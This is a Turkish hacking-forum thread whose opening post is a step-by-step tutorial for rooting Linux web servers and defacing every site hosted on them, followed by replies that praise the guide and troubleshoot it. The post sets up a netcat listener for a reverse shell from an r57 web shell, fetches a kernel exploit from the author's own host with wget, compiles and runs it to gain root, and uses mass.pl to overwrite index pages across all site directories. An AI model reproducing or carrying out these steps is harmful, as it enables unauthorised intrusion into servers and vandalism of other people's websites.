Linux Server Rooting

MuRo

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
425
Tepkime puanı
1
Puanları
0
Selamun Aleykum Arkadaşlar

bu konumda sizlere Linux Server Rooting anlatmaya çalışacağım.
bu işlev için Safe mod Off olması ve bir portunuzun açık olması gerekmektedir.

Neler yapmamız gerek sorusunada kısaca özetleyeyim.

1er adet.
netcat (hangi işletim sistemini kullanıyorsanız mesela ben windows versiyonunu indireceğim)
Shell( bc olmak için ideal shell olan r57’yi öneririm.)
mass.pl(toplu deface için kullanacagımız perl)


netcat programını google’dan indirip ilgili klasöre atınız.
ve win+r tuşuna basarak çalıştıra geçelim.

Arkadaşlar server’a baglanmayı şu şekilde özetleyeyim. Server’da bc olduk ve serverla pcmiz arasında bir bilgi
alışverişi olması gerek bu iş için bir portunuz açık olması gerek (önerilerim: 8888,2121,434) bu portlardan birini
açıp server’a baglanıyoruz önce açık portta girmemiz gerek çalıştır’a geçtiğimizi varsayarak şu işlemleri yapıyoruz

nc -vv -l -p 888 (// benim 8888 portum açık sizin hangi portunuz açık ise onu yazınız)

şöyle bir ekran gelmesi gerek.

VpH6.jpg



bu ekran geldiyse birdahaki işleminiz shell üzerinden’de baglantıyı kurmamız gerek bunun için

RKicg.jpg


Resimde görülen bc kısmına gelip 11457 silmeniz gerekiyor.
sildikden sonraki işleminiz kendi portunuzu yazıp baglan demeniz yeterli.

baglandıkdan sonra size dos’da şöyle bir yazılar gelicek...


connect to [10.0.3.3] from server.myhost.com (ip adresleri)
ve linux sürümü.(Linux 2.6.18 - 2011) gibi...
uid=24<apache> gid=24<apache> groups=24<apache>

bu işlemleriniz gerçekleşmesi demek server ile baglanıldıgının işaretidir.

ve bu işlemlerde linux sürümünü öğreniyoruz burada dikkat etmemiz gerekn bir husus var.
gerekli sürüm için gerekli exploiti derlememiz ve server üzerinde yetki vermemiz gerekmektedir.

ben mesela Linux 2.6.18 - 2011 exploiti bulup derliyorum ( exploit’ler c dilinden yazıldıgı için .c uzantılı
olarak kayıt ediyorum.)

exploit’min adını 2.6.18.c olarak kayıt ediyorum masaüstüme.

Yapmamız gereken 2. aşama ise 1 Server’a upload etmeliyiz.
Ben kendi Server’ıma upload ediyorum.
http://www.muroreis.in/2.6.18.c

-şimdi yapmamız gereken anlattıgım gibi exploitimizi server’a çekmek bu işlev için wget komutu kullanıyoruz

çalıştır’a gelerek işlevleri yapalım.

wget http://www.muroreis.in/2.6.18.c

bu işlev sonunda Saved yani kayıt edildi olması gerekmektedir.
şimdi ise Exploit’mizi derleyeceğiz.

gcc -o root 2.6.18.c
chmod 777 root // Tam yetki veriyoruz.

evet bu işlev sonunda exploitimiz derlenmiş oldu exploitimizi çağırmamız gerekmektedir.
exploitimizi derledik ve root adını aldırdık şimdiki işlem çağırmak olacak Çalıştır’a gelerek

./root

Yazalım.
Evet bu işlev sonunda Exploitimizi çalıştırdık.
şimdi Yetkili olup olmadıgını bakalım

id yazdık.

uid=<root>...

işlemleri geldiyse eger root olmuşuz demektir.

Evet Server Rooting bu kadar ama deface atmayıda anlatacagım.

Deface nedir? Server’a zarar vermeden index atma :)

Evet şimdi gerekli ekipmanımız mass.pl işlem için öncelikle elinizde bulunması gerek.

şimdi mass.pl shell’imizin bulundugu dizine upload ediyoruz.

ve çalıştır’dan perl’imizi çalıştırıyoruz.

perl mass.pl

ve karşınıza kullanımı gelecekdir büyük ihtimalle.

ve şöyle bir kullanım örneği sunayım.
perl mass.pl /tmp/index.html

bu şu demekdir buradaki indexi tüm dizinlere kopyala.

perl mass.pl /home/clanfo/domains/deneme.com/public_html/index.html

Evet bu işlev sonunda server’da bulunan siteler Deface ediliyor.
Whois çekip domainleri kayıt etmeyi unutmayınız.

iyi günler dilerim
 

fRaqS

Spys-Z
Katılım
21 Eyl 2012
Mesajlar
538
Tepkime puanı
0
Puanları
0
eline sağlık ;)
 

HACKOR

Yeni Üye
Katılım
25 Eyl 2012
Mesajlar
105
Tepkime puanı
0
Puanları
0
Harika anlatım hocam ama exploitleri hosgator yutmuş sanırım


Muro bir sorunla karşılaşıyorum nc açtığım anda kendiliğinden kapanıyor yardım edebilecek olan?
 

MuRo

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
425
Tepkime puanı
1
Puanları
0
yok onlar sadece birer örnek exploiti nasıl çalıştıracagınız hakkında nc kullanamamanda win7 ile alakası dogru sürümü indirmemiş olabilirsin
 

G3nzo

Moderator
Katılım
20 Eyl 2012
Mesajlar
1,992
Tepkime puanı
0
Puanları
36
Bro knk güzel anlarım :D exploitler forumda zaten veriliyo :)
 

HACKOR

Yeni Üye
Katılım
25 Eyl 2012
Mesajlar
105
Tepkime puanı
0
Puanları
0
Çözdüm hocam win7 de güvenlik ayarları ile alakalı forumlara baktım kimse çözüm vermiyor kendim çözdüm cmd yazıp girip güğven ayarlarına evet yaptığında çalışıyor.
 

EskiReis

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
503
Tepkime puanı
0
Puanları
0
Yaş
30
Web sitesi
ajanlar.org
Süper /Sabit.
 

EskiReis

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
503
Tepkime puanı
0
Puanları
0
Yaş
30
Web sitesi
ajanlar.org
System 32 ye kardeşim
 

DarkBLue

*Vıp Projection
Katılım
28 Eyl 2012
Mesajlar
877
Tepkime puanı
0
Puanları
16
Web sitesi
darkbluetr.blogspot.com
Eline Sağlık Reiss :D
 

Darkness

Yeni Üye
Katılım
6 Kas 2012
Mesajlar
75
Tepkime puanı
0
Puanları
0
Yaş
34
Eline Sağlık Çok Güzel Olmuş :}
 

BaDRaN

Prof Spys-z
Katılım
31 Eki 2012
Mesajlar
1,035
Tepkime puanı
0
Puanları
0
2121 portunu açtım ilk ekran görüntüsünü yaptım. Shellden bağlan dediğimde ise dos ekranına bir şey gelmedi. :/ Ne yapmalıyım?



Hallettim. Sorun kalmadı
 

MassCrew

Prof Spys-z
Katılım
21 Nis 2013
Mesajlar
1,116
Tepkime puanı
0
Puanları
0
Yaş
27
Ne yazıkki olmadı
 

MassCrew

Prof Spys-z
Katılım
21 Nis 2013
Mesajlar
1,116
Tepkime puanı
0
Puanları
0
Yaş
27
MASAÜSTÜ
 

BaDRaN

Prof Spys-z
Katılım
31 Eki 2012
Mesajlar
1,035
Tepkime puanı
0
Puanları
0
System 32 ye at o zaman çalışacaktır
 

MassCrew

Prof Spys-z
Katılım
21 Nis 2013
Mesajlar
1,116
Tepkime puanı
0
Puanları
0
Yaş
27
saolasın
 

S4V4S

Forumdan Uzaklaştırıldı
Katılım
19 Ocak 2013
Mesajlar
121
Tepkime puanı
0
Puanları
0
Ah bide portlarım olsa backtrack a mahkum kaldım :)
 
Üst
Copyright® Ajanlar.org 2012